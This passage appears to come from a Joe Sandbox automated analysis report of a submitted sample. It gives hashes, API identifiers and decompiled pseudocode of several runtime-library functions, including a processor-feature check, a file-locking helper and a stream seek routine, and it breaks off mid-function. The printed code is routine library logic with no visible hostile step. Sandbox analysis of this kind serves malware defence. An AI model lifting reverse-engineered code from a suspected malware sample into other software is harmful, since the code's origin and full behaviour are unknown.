                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4271482742-0
                                                                                                                                                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                                        			E00413610() {
                                                                                                                                                                                                        				signed long long _v12;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				signed long long _v28;
                                                                                                                                                                                                        				signed char _t8;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					_v20 =  *0x41fb50;
                                                                                                                                                                                                        					_v28 =  *0x41fb48;
                                                                                                                                                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                        					asm("fld1");
                                                                                                                                                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                        					asm("fnstsw ax");
                                                                                                                                                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                        					if(__eax == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						return __eax;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x00413615
                                                                                                                                                                                                        0x0041361d
                                                                                                                                                                                                        0x00413634
                                                                                                                                                                                                        0x004135e0
                                                                                                                                                                                                        0x004135e9
                                                                                                                                                                                                        0x004135f5
                                                                                                                                                                                                        0x004135f8
                                                                                                                                                                                                        0x004135fb
                                                                                                                                                                                                        0x004135fd
                                                                                                                                                                                                        0x00413600
                                                                                                                                                                                                        0x00413605
                                                                                                                                                                                                        0x0041360f
                                                                                                                                                                                                        0x00413607
                                                                                                                                                                                                        0x0041360b
                                                                                                                                                                                                        0x0041360b
                                                                                                                                                                                                        0x0041361f
                                                                                                                                                                                                        0x00413625
                                                                                                                                                                                                        0x0041362d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041362f
                                                                                                                                                                                                        0x0041362f
                                                                                                                                                                                                        0x00413633
                                                                                                                                                                                                        0x00413633
                                                                                                                                                                                                        0x0041362d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                                                        				signed int _t75;
                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                        				char _t82;
                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                        				intOrPtr* _t86;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				intOrPtr* _t90;
                                                                                                                                                                                                        				signed int _t92;
                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                        				signed char _t98;
                                                                                                                                                                                                        				signed int _t99;
                                                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                                                        				intOrPtr* _t104;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				signed int _t114;
                                                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t105 = __esi;
                                                                                                                                                                                                        				_t97 = __edx;
                                                                                                                                                                                                        				_t104 = _a4;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t121 = _t104;
                                                                                                                                                                                                        				if(_t104 != 0) {
                                                                                                                                                                                                        					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                                                                                                                                                        					__eflags =  *(_t104 + 4);
                                                                                                                                                                                                        					_v8 = _t70;
                                                                                                                                                                                                        					if(__eflags < 0) {
                                                                                                                                                                                                        						 *(_t104 + 4) = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(1);
                                                                                                                                                                                                        					_push(_t87);
                                                                                                                                                                                                        					_push(_t70);
                                                                                                                                                                                                        					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                                                                                                        					__eflags = _t71 - _t87;
                                                                                                                                                                                                        					_v12 = _t71;
                                                                                                                                                                                                        					if(_t71 < _t87) {
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return _t71 | 0xffffffff;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t98 =  *(_t104 + 0xc);
                                                                                                                                                                                                        						__eflags = _t98 & 0x00000108;
                                                                                                                                                                                                        						if((_t98 & 0x00000108) != 0) {
                                                                                                                                                                                                        							_t73 =  *_t104;
                                                                                                                                                                                                        							_t92 =  *(_t104 + 8);
                                                                                                                                                                                                        							_push(_t105);
                                                                                                                                                                                                        							_v16 = _t73 - _t92;
                                                                                                                                                                                                        							__eflags = _t98 & 0x00000003;
                                                                                                                                                                                                        							if((_t98 & 0x00000003) == 0) {
                                                                                                                                                                                                        								__eflags = _t98;
                                                                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                                                                        									L15:
                                                                                                                                                                                                        									__eflags = _v12 - _t87;
                                                                                                                                                                                                        									if(_v12 != _t87) {
                                                                                                                                                                                                        										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                                                                                                        										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                        											L40:
                                                                                                                                                                                                        											_t75 = _v16 + _v12;
                                                                                                                                                                                                        											__eflags = _t75;
                                                                                                                                                                                                        											L41:
                                                                                                                                                                                                        											return _t75;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t99 =  *(_t104 + 4);
                                                                                                                                                                                                        										__eflags = _t99 - _t87;
                                                                                                                                                                                                        										if(_t99 != _t87) {
                                                                                                                                                                                                        											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                                                                                                                                                        											_a4 = _t73 - _t92 + _t99;
                                                                                                                                                                                                        											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                        											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												L39:
                                                                                                                                                                                                        												_t66 =  &_v12;
                                                                                                                                                                                                        												 *_t66 = _v12 - _a4;
                                                                                                                                                                                                        												__eflags =  *_t66;
                                                                                                                                                                                                        												goto L40;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_push(2);
                                                                                                                                                                                                        											_push(0);
                                                                                                                                                                                                        											_push(_v8);
                                                                                                                                                                                                        											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(_v12);
                                                                                                                                                                                                        												_push(_v8);
                                                                                                                                                                                                        												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                                                                                                        												__eflags = _t81;
                                                                                                                                                                                                        												if(_t81 >= 0) {
                                                                                                                                                                                                        													_t82 = 0x200;
                                                                                                                                                                                                        													__eflags = _a4 - 0x200;
                                                                                                                                                                                                        													if(_a4 > 0x200) {
                                                                                                                                                                                                        														L35:
                                                                                                                                                                                                        														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                                                                                                        														L36:
                                                                                                                                                                                                        														_a4 = _t82;
                                                                                                                                                                                                        														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                                                                                                        														L37:
                                                                                                                                                                                                        														if(__eflags != 0) {
                                                                                                                                                                                                        															_t63 =  &_a4;
                                                                                                                                                                                                        															 *_t63 = _a4 + 1;
                                                                                                                                                                                                        															__eflags =  *_t63;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L39;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t94 =  *(_t104 + 0xc);
                                                                                                                                                                                                        													__eflags = _t94 & 0x00000008;
                                                                                                                                                                                                        													if((_t94 & 0x00000008) == 0) {
                                                                                                                                                                                                        														goto L35;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t94 & 0x00000400;
                                                                                                                                                                                                        													if((_t94 & 0x00000400) == 0) {
                                                                                                                                                                                                        														goto L36;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													goto L35;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L31:
                                                                                                                                                                                                        												_t75 = _t81 | 0xffffffff;
                                                                                                                                                                                                        												goto L41;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t84 =  *(_t104 + 8);
                                                                                                                                                                                                        											_t96 = _a4 + _t84;
                                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                                        												__eflags = _t84 - _t96;
                                                                                                                                                                                                        												if(_t84 >= _t96) {
                                                                                                                                                                                                        													break;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t84 - 0xa;
                                                                                                                                                                                                        												if( *_t84 == 0xa) {
                                                                                                                                                                                                        													_t44 =  &_a4;
                                                                                                                                                                                                        													 *_t44 = _a4 + 1;
                                                                                                                                                                                                        													__eflags =  *_t44;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t84 = _t84 + 1;
                                                                                                                                                                                                        												__eflags = _t84;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v16 = _t87;
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t75 = _v16;
                                                                                                                                                                                                        									goto L41;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t81 = E0040BFC1(__eflags);
                                                                                                                                                                                                        								 *_t81 = 0x16;
                                                                                                                                                                                                        								goto L31;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                                                                                                                                                        							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                        							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                                                                                                        							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                                                                                                        								goto L15;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t103 = _t92;
                                                                                                                                                                                                        							__eflags = _t103 - _t73;
                                                                                                                                                                                                        							if(_t103 >= _t73) {
                                                                                                                                                                                                        								goto L15;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t115 = _t73;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								__eflags =  *_t103 - 0xa;
                                                                                                                                                                                                        								if( *_t103 == 0xa) {
                                                                                                                                                                                                        									_v16 = _v16 + 1;
                                                                                                                                                                                                        									_t87 = 0;
                                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t103 = _t103 + 1;
                                                                                                                                                                                                        								__eflags = _t103 - _t115;
                                                                                                                                                                                                        							} while (_t103 < _t115);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				 *_t86 = 0x16;
                                                                                                                                                                                                        				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}






























                                                                                                                                                                                                        0x0040c748
                                                                                                                                                                                                        0x0040c748
                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                        0x0040c755
                                                                                                                                                                                                        0x0040c757
                                                                                                                                                                                                        0x0040c759
                                                                                                                                                                                                        0x0040c77c
                                                                                                                                                                                                        0x0040c781
                                                                                                                                                                                                        0x0040c785
                                                                                                                                                                                                        0x0040c788
                                                                                                                                                                                                        0x0040c78a
                                                                                                                                                                                                        0x0040c78a
                                                                                                                                                                                                        0x0040c78d
                                                                                                                                                                                                        0x0040c78f
                                                                                                                                                                                                        0x0040c790
                                                                                                                                                                                                        0x0040c791
                                                                                                                                                                                                        0x0040c799
                                                                                                                                                                                                        0x0040c79b
                                                                                                                                                                                                        0x0040c79e
                                                                                                                                                                                                        0x0040c773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7a0
                                                                                                                                                                                                        0x0040c7a0
                                                                                                                                                                                                        0x0040c7a3
                                                                                                                                                                                                        0x0040c7a9
                                                                                                                                                                                                        0x0040c7b3
                                                                                                                                                                                                        0x0040c7b5
                                                                                                                                                                                                        0x0040c7b8
                                                                                                                                                                                                        0x0040c7bd
                                                                                                                                                                                                        0x0040c7c0
                                                                                                                                                                                                        0x0040c7c3
                                                                                                                                                                                                        0x0040c806
                                                                                                                                                                                                        0x0040c808
                                                                                                                                                                                                        0x0040c7f9
                                                                                                                                                                                                        0x0040c7f9
                                                                                                                                                                                                        0x0040c7fc
                                                                                                                                                                                                        0x0040c81a
                                                                                                                                                                                                        0x0040c81e
                                                                                                                                                                                                        0x0040c8d8
                                                                                                                                                                                                        0x0040c8de
                                                                                                                                                                                                        0x0040c8de
                                                                                                                                                                                                        0x0040c8e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8e0
                                                                                                                                                                                                        0x0040c824
                                                                                                                                                                                                        0x0040c827
                                                                                                                                                                                                        0x0040c829
                                                                                                                                                                                                        0x0040c843
                                                                                                                                                                                                        0x0040c84a
                                                                                                                                                                                                        0x0040c84f
                                                                                                                                                                                                        0x0040c852
                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                        0x0040c8d2
                                                                                                                                                                                                        0x0040c8d5
                                                                                                                                                                                                        0x0040c8d5
                                                                                                                                                                                                        0x0040c8d5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8d5
                                                                                                                                                                                                        0x0040c859
                                                                                                                                                                                                        0x0040c85b
                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                        0x0040c868
                                                                                                                                                                                                        0x0040c86b
                                                                                                                                                                                                        0x0040c88d
                                                                                                                                                                                                        0x0040c88f
                                                                                                                                                                                                        0x0040c892
                                                                                                                                                                                                        0x0040c895
                                                                                                                                                                                                        0x0040c89d
                                                                                                                                                                                                        0x0040c89f
                                                                                                                                                                                                        0x0040c8a6
                                                                                                                                                                                                        0x0040c8ab
                                                                                                                                                                                                        0x0040c8ae
                                                                                                                                                                                                        0x0040c8c0
                                                                                                                                                                                                        0x0040c8c0
                                                                                                                                                                                                        0x0040c8c3
                                                                                                                                                                                                        0x0040c8c3
                                                                                                                                                                                                        0x0040c8c8
                                                                                                                                                                                                        0x0040c8cd
                                                                                                                                                                                                        0x0040c8cd
                                                                                                                                                                                                        0x0040c8cf
                                                                                                                                                                                                        0x0040c8cf
                                                                                                                                                                                                        0x0040c8cf
                                                                                                                                                                                                        0x0040c8cf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8cd
                                                                                                                                                                                                        0x0040c8b0
                                                                                                                                                                                                        0x0040c8b3
                                                                                                                                                                                                        0x0040c8b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8b8
                                                                                                                                                                                                        0x0040c8be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8be
                                                                                                                                                                                                        0x0040c8a1
                                                                                                                                                                                                        0x0040c8a1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c8a1
                                                                                                                                                                                                        0x0040c86d
                                                                                                                                                                                                        0x0040c873
                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                        0x0040c882
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c877
                                                                                                                                                                                                        0x0040c87a
                                                                                                                                                                                                        0x0040c87c
                                                                                                                                                                                                        0x0040c87c
                                                                                                                                                                                                        0x0040c87c
                                                                                                                                                                                                        0x0040c87c
                                                                                                                                                                                                        0x0040c87f
                                                                                                                                                                                                        0x0040c87f
                                                                                                                                                                                                        0x0040c87f
                                                                                                                                                                                                        0x0040c884
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c884
                                                                                                                                                                                                        0x0040c82b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c82b
                                                                                                                                                                                                        0x0040c7fe
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7fe
                                                                                                                                                                                                        0x0040c80a
                                                                                                                                                                                                        0x0040c80f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c80f
                                                                                                                                                                                                        0x0040c7ce
                                                                                                                                                                                                        0x0040c7d8
                                                                                                                                                                                                        0x0040c7db
                                                                                                                                                                                                        0x0040c7e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7e2
                                                                                                                                                                                                        0x0040c7e4
                                                                                                                                                                                                        0x0040c7e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                        0x0040c7ea
                                                                                                                                                                                                        0x0040c7ea
                                                                                                                                                                                                        0x0040c7ed
                                                                                                                                                                                                        0x0040c7ef
                                                                                                                                                                                                        0x0040c7f2
                                                                                                                                                                                                        0x0040c7f2
                                                                                                                                                                                                        0x0040c7f2
                                                                                                                                                                                                        0x0040c7f4
                                                                                                                                                                                                        0x0040c7f5
                                                                                                                                                                                                        0x0040c7f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7ea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c7ab
                                                                                                                                                                                                        0x0040c79e
                                                                                                                                                                                                        0x0040c75b
                                                                                                                                                                                                        0x0040c760
                                                                                                                                                                                                        0x0040c761
                                                                                                                                                                                                        0x0040c762
                                                                                                                                                                                                        0x0040c763
                                                                                                                                                                                                        0x0040c764
                                                                                                                                                                                                        0x0040c765
                                                                                                                                                                                                        0x0040c76b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                        • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2395185920-0
                                                                                                                                                                                                        • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 97%
                                                                                                                                                                                                        			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                                        				signed int _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				signed int* _t53;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t54 = __ebp;
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t42 = __ebx;
                                                                                                                                                                                                        				_t53 = _a4;
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					_t31 = _t30 | 0xffffffff;
                                                                                                                                                                                                        					__eflags = _t31;
                                                                                                                                                                                                        					return _t31;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t43 = _a12;
                                                                                                                                                                                                        					if(_t43 == 2) {
                                                                                                                                                                                                        						goto L40;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t30 = _t53[0xe];
                                                                                                                                                                                                        						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t48 = _a8;
                                                                                                                                                                                                        							if(_t53[0x17] != 0x77) {
                                                                                                                                                                                                        								__eflags = _t43 - 1;
                                                                                                                                                                                                        								if(_t43 == 1) {
                                                                                                                                                                                                        									_t48 = _t48 + _t53[0x1a];
                                                                                                                                                                                                        									__eflags = _t48;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t48;
                                                                                                                                                                                                        								if(_t48 < 0) {
                                                                                                                                                                                                        									goto L39;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t53[0x16];
                                                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                                                        										_t33 = _t53[0x1a];
                                                                                                                                                                                                        										__eflags = _t48 - _t33;
                                                                                                                                                                                                        										if(_t48 < _t33) {
                                                                                                                                                                                                        											_t30 = E004054F0(_t42, _t54, _t53);
                                                                                                                                                                                                        											_t55 = _t55 + 4;
                                                                                                                                                                                                        											__eflags = _t30;
                                                                                                                                                                                                        											if(_t30 < 0) {
                                                                                                                                                                                                        												goto L39;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L27;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t48 = _t48 - _t33;
                                                                                                                                                                                                        											L27:
                                                                                                                                                                                                        											__eflags = _t48;
                                                                                                                                                                                                        											if(_t48 == 0) {
                                                                                                                                                                                                        												L38:
                                                                                                                                                                                                        												return _t53[0x1a];
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t53[0x12];
                                                                                                                                                                                                        												if(_t53[0x12] != 0) {
                                                                                                                                                                                                        													L30:
                                                                                                                                                                                                        													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                                                                                                                        													if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                                        														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                                        														_t48 = _t48 - 1;
                                                                                                                                                                                                        														__eflags = _t53[0x1c];
                                                                                                                                                                                                        														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                                        														if(_t53[0x1c] != 0) {
                                                                                                                                                                                                        															_t53[0xe] = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t48;
                                                                                                                                                                                                        													if(_t48 <= 0) {
                                                                                                                                                                                                        														goto L38;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														while(1) {
                                                                                                                                                                                                        															_t35 = 0x4000;
                                                                                                                                                                                                        															__eflags = _t48 - 0x4000;
                                                                                                                                                                                                        															if(_t48 < 0x4000) {
                                                                                                                                                                                                        																_t35 = _t48;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                                        															_t55 = _t55 + 0xc;
                                                                                                                                                                                                        															__eflags = _t30;
                                                                                                                                                                                                        															if(_t30 <= 0) {
                                                                                                                                                                                                        																goto L39;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															_t48 = _t48 - _t30;
                                                                                                                                                                                                        															__eflags = _t48;
                                                                                                                                                                                                        															if(_t48 > 0) {
                                                                                                                                                                                                        																continue;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																goto L38;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L41;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L39;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                                        													_t55 = _t55 + 4;
                                                                                                                                                                                                        													_t53[0x12] = _t30;
                                                                                                                                                                                                        													__eflags = _t30;
                                                                                                                                                                                                        													if(_t30 == 0) {
